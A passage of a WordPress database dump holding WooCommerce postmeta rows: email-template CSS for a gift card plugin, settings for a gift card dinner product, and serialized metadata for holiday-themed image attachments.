table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}'),(5905,427,'_thumbnail_id','418'),(5906,428,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}'),(5907,428,'_thumbnail_id','419'),(5908,429,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img img{display: block; margin: 0 auto; max-width: 400px; width: 100%; padding: 12px 5px 40px;}'),(5909,429,'_thumbnail_id','420'),(5910,430,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img img{display: block; margin: 0 auto; max-width: 400px; width: 100%; padding: 12px 5px 40px;}'),(5911,430,'_thumbnail_id','421'),(5912,431,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_image img{display: block; margin: 0 auto; max-width: 550px; width: 100%;}'),(5913,431,'_thumbnail_id','422'),(5914,432,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}'),(5915,432,'_thumbnail_id','423'),(5916,433,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img{max-width: 600px;}'),(5917,433,'_thumbnail_id','424'),(5918,435,'_wc_review_count','0'),(5919,435,'_wc_rating_count','a:0:{}'),(5920,435,'_wc_average_rating','0'),(5921,435,'_edit_lock','1563304102:1'),(5922,435,'_edit_last','1'),(5923,435,'_sku','regalacena-creativo'),(5924,435,'_regular_price','100'),(5925,435,'_sale_price',''),(5926,435,'_sale_price_dates_from',''),(5927,435,'_sale_price_dates_to',''),(5928,435,'total_sales','6'),(5929,435,'_tax_status','taxable'),(5930,435,'_tax_class',''),(5931,435,'_manage_stock','no'),(5932,435,'_backorders','no'),(5933,435,'_sold_individually','no'),(5934,435,'_weight',''),(5935,435,'_length',''),(5936,435,'_width',''),(5937,435,'_height',''),(5938,435,'_upsell_ids','a:0:{}'),(5939,435,'_crosssell_ids','a:0:{}'),(5940,435,'_purchase_note','Escluso bevande'),(5941,435,'_default_attributes','a:0:{}'),(5942,435,'_virtual','no'),(5943,435,'_downloadable','no'),(5944,435,'_product_image_gallery',''),(5945,435,'_download_limit','-1'),(5946,435,'_download_expiry','-1'),(5947,435,'_stock',NULL),(5948,435,'_stock_status','instock'),(5949,435,'_product_version','3.6.5'),(5950,435,'_price','100'),(5951,435,'mwb_wgm_pricing','a:4:{s:13:\"default_price\";s:3:\"100\";s:4:\"type\";s:21:\"mwb_wgm_default_price\";s:8:\"template\";a:1:{i:0;s:3:\"468\";}s:14:\"by_default_tem\";b:1;}'),(5952,435,'mwb_wgm_overwrite','yes'),(5953,435,'mwb_wgm_email_to_recipient','yes'),(5954,435,'mwb_wgm_download','yes'),(5955,435,'mwb_wgm_shipping',NULL),(5956,435,'_yoast_wpseo_primary_product_cat','23'),(5957,435,'_yoast_wpseo_content_score','90'),(5958,401,'_edit_lock','1499717341:1'),(5959,401,'_edit_last','1'),(5960,401,'mwb_css_field',''),(5961,437,'_wp_attached_file','2017/07/thanksgive-1.png'),(5962,437,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:712;s:6:\"height\";i:494;s:4:\"file\";s:24:\"2017/07/thanksgive-1.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"thanksgive-1-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"thanksgive-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"thanksgive-1-600x416.png\";s:5:\"width\";i:600;s:6:\"height\";i:416;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"thanksgive-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"thanksgive-1-300x208.png\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"thanksgive-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:24:\"thanksgive-1-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"thanksgive-1-600x416.png\";s:5:\"width\";i:600;s:6:\"height\";i:416;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:24:\"thanksgive-1-550x400.png\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:24:\"thanksgive-1-230x160.png\";s:5:\"width\";i:230;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:24:\"thanksgive-1-350x243.png\";s:5:\"width\";i:350;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:24:\"thanksgive-1-480x333.png\";s:5:\"width\";i:480;s:6:\"height\";i:333;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5963,438,'_wp_attached_file','2017/07/president-day-1.png'),(5964,438,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:615;s:6:\"height\";i:749;s:4:\"file\";s:27:\"2017/07/president-day-1.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"president-day-1-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"president-day-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"president-day-1-600x731.png\";s:5:\"width\";i:600;s:6:\"height\";i:731;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"president-day-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"president-day-1-246x300.png\";s:5:\"width\";i:246;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"president-day-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"president-day-1-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"president-day-1-600x731.png\";s:5:\"width\";i:600;s:6:\"height\";i:731;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:27:\"president-day-1-550x400.png\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:27:\"president-day-1-230x280.png\";s:5:\"width\";i:230;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:27:\"president-day-1-350x426.png\";s:5:\"width\";i:350;s:6:\"height\";i:426;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:27:\"president-day-1-480x585.png\";s:5:\"width\";i:480;s:6:\"height\";i:585;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5965,439,'_wp_attached_file','2017/07/halloween-1.png'),(5966,439,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:636;s:4:\"file\";s:23:\"2017/07/halloween-1.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"halloween-1-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"halloween-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"halloween-1-600x545.png\";s:5:\"width\";i:600;s:6:\"height\";i:545;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"halloween-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"halloween-1-300x273.png\";s:5:\"width\";i:300;s:6:\"height\";i:273;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"halloween-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"halloween-1-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"halloween-1-600x545.png\";s:5:\"width\";i:600;s:6:\"height\";i:545;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:23:\"halloween-1-550x400.png\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:23:\"halloween-1-230x209.png\";s:5:\"width\";i:230;s:6:\"height\";i:209;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:23:\"halloween-1-350x318.png\";s:5:\"width\";i:350;s:6:\"height\";i:318;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:23:\"halloween-1-480x436.png\";s:5:\"width\";i:480;s:6:\"height\";i:436;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5967,440,'_wp_attached_file','2017/07/Group-1-1.png'),(5968,440,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:230;s:6:\"height\";i:350;s:4:\"file\";s:21:\"2017/07/Group-1-1.png\";s:5:\"sizes\";a:7:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"Group-1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"Group-1-1-200x250.png\";s:5:\"width\";i:200;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Group-1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Group-1-1-197x300.png\";s:5:\"width\";i:197;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"Group-1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"Group-1-1-200x250.png\";s:5:\"width\";i:200;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:21:\"Group-1-1-230x350.png\";s:5:\"width\";i:230;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5969,441,'_wp_attached_file','2017/07/Shape-4-copy-4-1.png'),(5970,441,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:487;s:6:\"height\";i:572;s:4:\"file\";s:28:\"2017/07/Shape-4-copy-4-1.png\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"Shape-4-copy-4-1-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"Shape-4-copy-4-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"Shape-4-copy-4-1-300x352.png\";s:5:\"width\";i:300;s:6:\"height\";i:352;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Shape-4-copy-4-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Shape-4-copy-4-1-255x300.png\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"Shape-4-copy-4-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"Shape-4-copy-4-1-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:28:\"Shape-4-copy-4-1-487x400.png\";s:5:\"width\";i:487;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:28:\"Shape-4-copy-4-1-230x270.png\";s:5:\"width\";i:230;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:28:\"Shape-4-copy-4-1-350x411.png\";s:5:\"width\";i:350;s:6:\"height\";i:411;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:28:\"Shape-4-copy-4-1-480x564.png\";s:5:\"width\";i:480;s:6:\"height\";i:564;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5971,442,'_wp_attached_file','2017/07/mother-1.png'),(5972,442,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:466;s:6:\"height\";i:208;s:4:\"file\";s:20:\"2017/07/mother-1.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"mother-1-300x208.png\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"mother-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"mother-1-300x134.png\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"mother-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"mother-1-300x134.png\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"mother-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"mother-1-300x208.png\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:20:\"mother-1-230x103.png\";s:5:\"width\";i:230;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:20:\"mother-1-350x156.png\";s:5:\"width\";i:350;s:6:\"height\";i:156;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5973,443,'_wp_attached_file','2017/07/christmas-1.png'),(5974,443,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:543;s:6:\"height\";i:313;s:4:\"file\";s:23:\"2017/07/christmas-1.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"christmas-1-300x313.png\";s:5:\"width\";i:300;s:6:\"height\";i:313;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"christmas-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"christmas-1-300x173.png\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"christmas-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"christmas-1-300x173.png\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"christmas-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"christmas-1-300x313.png\";s:5:\"width\";i:300;s:6:\"height\";i:313;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:23:\"christmas-1-230x133.png\";s:5:\"width\";i:230;s:6:\"height\";i:133;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:23:\"christmas-1-350x202.png\";s:5:\"width\";i:350;s:6:\"height\";i:202;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:23:\"christmas-1-480x277.png\";s:5:\"width\";i:480;s:6:\"height\";i:277;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1